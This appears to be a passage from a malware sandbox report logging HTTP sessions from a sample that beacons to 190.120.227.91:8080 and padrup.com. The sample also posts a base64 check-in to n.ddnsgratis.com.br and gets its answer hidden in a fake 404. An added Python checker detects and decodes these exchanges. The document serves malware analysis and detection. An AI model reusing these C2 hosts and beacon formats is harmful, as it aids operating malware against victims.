Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-c3VjY2Vzcw==--->
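Sessions 16 to 18 carry three things an analyst would want to re-check by hand rather than trust from the report alone: the two GET beacons reuse a fixed, obsolete User-Agent string ("MSIE 7.0b; Windows NT 6.0") against a .gif path whose single query parameter has a short hex name and a decimal value; the POST to n.ddnsgratis.com.br sends a base64 form field (`_wv=ZW50ZXI=`, which decodes to `enter`); and the server's "404 Not Found" reply continues past `</html>` with a second base64 token (`c3VjY2Vzcw==`, which decodes to `success`), so the 404 is the C2 answer, not a miss. The following checker is an added example, not part of the Joe Sandbox report and not code from the sample. It parses the three transactions (constructed here by transcribing the report's ASCII rendering; the truncated part of the 404 body is kept as "..." as printed, and the 200 body is abridged), applies these three checks and decodes the tokens. The beacon heuristic (legacy UA plus .gif plus hex-named query parameter) and the "data after `</html>` in a 404" rule are this example's own, not a published signature.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: sessions 16, 17 and 18 transcribed from the report.
# The truncated part of the 404 body is kept as "..." exactly as printed.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
SESSIONS = [
    {"id": 16,
     "request": ("GET /sobakavolos.gif?3ff2df5=201165279 HTTP/1.1\r\n"
                 f"User-Agent: {LEGACY_UA}\r\nHost: 190.120.227.91:8080\r\n"
                 "Cache-Control: no-cache\r\n\r\n"),
     "response": ""},
    {"id": 17,
     "request": ("POST /n/tasks.php HTTP/1.0\r\nHost: n.ddnsgratis.com.br\r\n"
                 "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) "
                 "Gecko/20100101 Firefox/38.0\r\n"
                 "Content-type: application/x-www-form-urlencoded\r\n"
                 "Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b\r\n"
                 "Content-length: 12\r\n\r\n_wv=ZW50ZXI=\n"),
     "response": ("HTTP/1.1 404 Not Found\r\nStatus: 404 Not Found\r\n"
                  "Content-Length: 357\r\nContent-Type: text/html; charset=utf8\r\n\r\n"
                  "<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n"
                  "<h1>Not Found</h1>\r\n<p>The requested URL /n/tasks.php was not "
                  "found on this server.</p>\r\n</body></html>...-c3VjY2Vzcw==--->")},
    {"id": 18,
     "request": ("GET /sobaka1.gif?47aa66b=526028013 HTTP/1.1\r\n"
                 f"User-Agent: {LEGACY_UA}\r\nHost: padrup.com\r\n"
                 "Cache-Control: no-cache\r\n\r\n"),
     "response": ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html; "
                  "charset=UTF-8\r\nX-Redirect: skenzo\r\n\r\n"
                  "<html xmlns=\"http://www.w3.org/1999/xhtml\"><head>"
                  "<title>padrup&#46;com</title>")},
]

# Heuristics are this example's own, derived from the three sessions above.
BEACON_QUERY = re.compile(r"^[0-9a-f]{6,8}=\d+$")          # hex name, decimal value
TRAILER_TOKEN = re.compile(r"-([A-Za-z0-9+/]+={0,2})--->\s*$")  # token before "--->"


def parse_http(text):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def try_base64(token):
    """Strictly decode base64; return text only if it is printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or not all(0x20 <= b < 0x7F for b in raw):
        return None
    return raw.decode("ascii")


def check_request(text):
    """Findings for one request: beacon-style GET, or base64 form fields in a POST."""
    start, headers, body = parse_http(text)
    findings = []
    method, _, rest = start.partition(" ")
    url = urlsplit(rest.rsplit(" ", 1)[0])          # drop the HTTP version
    if (method == "GET" and url.path.endswith(".gif")
            and headers.get("user-agent") == LEGACY_UA
            and BEACON_QUERY.match(url.query)):
        findings.append(("beacon-get", url.path, url.query))
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        for key, values in parse_qs(body.strip(), keep_blank_values=True).items():
            for value in values:
                decoded = try_base64(value)
                if decoded is not None:
                    findings.append(("base64-form-field", key, decoded))
    return findings


def check_response(text):
    """Findings for one response: a 404 whose body continues after </html>."""
    if not text:
        return []
    start, _, body = parse_http(text)
    parts = start.split(" ")
    status = parts[1] if len(parts) > 1 else ""
    _, sep, tail = body.partition("</html>")
    if status == "404" and sep and tail.strip():
        match = TRAILER_TOKEN.search(tail)
        decoded = try_base64(match.group(1)) if match else None
        return [("404-trailer", tail.strip(), decoded)]
    return []


def analyze(sessions):
    """Map session id -> findings from its request and response."""
    return {s["id"]: check_request(s["request"]) + check_response(s["response"])
            for s in sessions}


if __name__ == "__main__":
    for sid, found in analyze(SESSIONS).items():
        for finding in found:
            print(sid, *finding)
```

Running it prints one `beacon-get` line each for sessions 16 and 18, and for session 17 both the decoded `_wv` value (`enter`) and the decoded 404 trailer (`success`). The "404-trailer" check is the one worth carrying into production logic: a proxy or IDS that treats 4xx responses as uninteresting will miss this exchange entirely, whereas checking for non-whitespace after `</html>` on error pages costs nothing. The `Cookie: auth=` value (32 hex characters) is left as-is here because the report gives no way to decode it.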


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49735 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:29.409254074 CEST | 155 | OUT | GET /sobaka1.gif?47aa66b=526028013 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:42:30.465254068 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Ig0XsCp5ELL0xze+8PI0DHPPR6TgFbRZ9i9RL2OKASVXvwhM4rxxEsKC6I7toPK4UeqFQE5fZVJNZ/PPz0cHIQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:30.465279102 CEST | 214 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE1MC4xMTEyOmM5OWYzY2UwNjliMzQ4MDQ1ZTA0ZTY5OTFjZGY3NmU3NmUyYzI5MmMwOGY3ODFjN2I5NWMyYjU0MTM
Oct 18, 2024 12:42:30.465325117 CEST | 1236 | IN | Data Raw: 36 65 65 0d 0a 32 59 6a 49 78 4d 44 55 36 4e 6a 63 78 4d 6a 4e 69 4f 54 59 78 59 6a 49 33 4e 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27
Data Ascii: 6ee2YjIxMDU6NjcxMjNiOTYxYjI3Ng==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '
Oct 18, 2024 12:42:30.465367079 CEST | 550 | IN | Data Raw: 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74
Data Ascii: .'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123b96&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '2b42ab85781007a0cc0f13dc2cf9248a53045160');</script><scr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49736 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:30.492866993 CEST | 168 | OUT | GET /sobakavolos.gif?4991659=617132744 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49737 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:35.799225092 CEST | 155 | OUT | GET /sobaka1.gif?50e8edc=169680312 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:42:36.978919029 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_R55ZA4ClrQoDlBVAYm89k3zx3yaVdbNlNsP1X0a9QaZw5qHCczlQWr6kZXKwCtEF3QGmbrKVRoGF1tFweVffiw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:36.978931904 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE1Ni41MzI2OmFiMWNmZTUzYmEwY2JlMGYwYWNiZjQwMmFjNTlhYWM0MTFhNzcxNThmOWRhNTI1NDc2ZDNmOGY1MDM2MmQ3ZTM6NjcxMjNiOWM4MjA2ZA==';
Oct 18, 2024 12:42:36.978941917 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:42:36.978952885 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 34 30 65 37 37 65 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 14640e77ef');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h
Oct 18, 2024 12:42:36.978971958 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 34 30 65 37 37 65 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 14640e77ef');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
21          192.168.2.9  49738        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp: Oct 18, 2024 12:42:37.028320074 CEST  Bytes transferred: 168  Direction: OUT
GET /sobakavolos.gif?542972c=882501560 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
22          192.168.2.9  49740        185.53.178.50   80                800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp: Oct 18, 2024 12:42:41.642599106 CEST  Bytes transferred: 155  Direction: OUT
GET /sobaka1.gif?5b7e0de=767493872 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache

Timestamp: Oct 18, 2024 12:42:42.705452919 CEST  Bytes transferred: 1236  Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_uJ23PUJ+/lXIeUehIHePTtO/k4YOGqySpsyfWXjqHW13ZiTtEnig4MhMRVerDUKl0MVcthyZ9o/CuCoDIqM0GQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf

Timestamp: Oct 18, 2024 12:42:42.705684900 CEST  Bytes transferred: 1236  Direction: IN
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE2Mi4zNTMzOjEzOThmMGYyYmVlN2FkZTU1MTA1ZTRhZTczMWU5NDJjYjc4Y2M5ZWEzZGI5MWM5YzA4NjU5ZDc3ZTNkOGI3OWI6NjcxMjNiYTI1NjQyNA==';

Timestamp: Oct 18, 2024 12:42:42.705697060 CEST  Bytes transferred: 757  Direction: IN
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
23          192.168.2.9  49741        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp: Oct 18, 2024 12:42:43.483916998 CEST  Bytes transferred: 169  Direction: OUT
GET /sobakavolos.gif?10d62ae4=564942280 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          24192.168.2.949759185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.519427061 CEST158OUTGET /sobaka1.gif?115dbf54=-1381402296 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.865255117 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:49 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_LYAs2Qg1fmeRPNkZ/oEjhQdi99lI78Lh+mmOA1Z/nX3pTCzPoX2jWa5M8CohKOuXjYfXi0g+g0C3hnx+nBhbTg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:49.866540909 CEST | 1236 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE2OS4zMTY0OjMyYjM3OGExYTcxNWIyNWU0MDBjMzFjYmIzNzU1Y2RkYzVhYTk1MTBjYTgzY2ZkNzYyY2M0ZGE0ZjYwM2VkZDA6NjcxMjNiYTk0ZDNmZQ==';
Oct 18, 2024 12:42:49.866552114 CEST | 764 | IN | Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:42:49.896806955 CEST | 764 | IN | Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 49767 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:50.191215992 CEST | 169 | OUT | GET /sobakavolos.gif?1176f212=293007890 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 49784 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:54.940896988 CEST | 158 | OUT | GET /sobaka1.gif?11fef99e=-1275740116 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:42:56.007972002 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:42:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_dZ+v4ctXFmBQxx0fm3kSaY6uCWtZJNpDBGF9dIRMwPCrVqUZmWedj2RDJVL0QJE8mpDXaTT7y3m5e3URTbCPtQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:56.008053064 CEST | 224 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE3NS42NjcyOjQyZTM1MTJjNzdlYmM1YjBiMzQxYzgwNDQ2NDA4ZDA3ODA1MjhmY2ZjOTM3YTIwMDBkOWMyNjI3OTIwNTNmOTM6Njc
Oct 18, 2024 12:42:56.008063078 CEST | 1236 | IN | Data Ascii: xMjNiYWZhMmUzMw==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
Oct 18, 2024 12:42:56.008069038 CEST | 540 | IN | Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123baf&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'f299b2a5c4f1f0c5e79b41bed38c12b9e146b91d080');</script><script type='


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 49789 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:42:56.347258091 CEST | 171 | OUT | GET /sobakavolos.gif?121e2607=-1559275969 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 49806 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:00.612019062 CEST | 158 | OUT | GET /sobaka1.gif?12ba214d=-2095650533 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:43:01.755256891 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
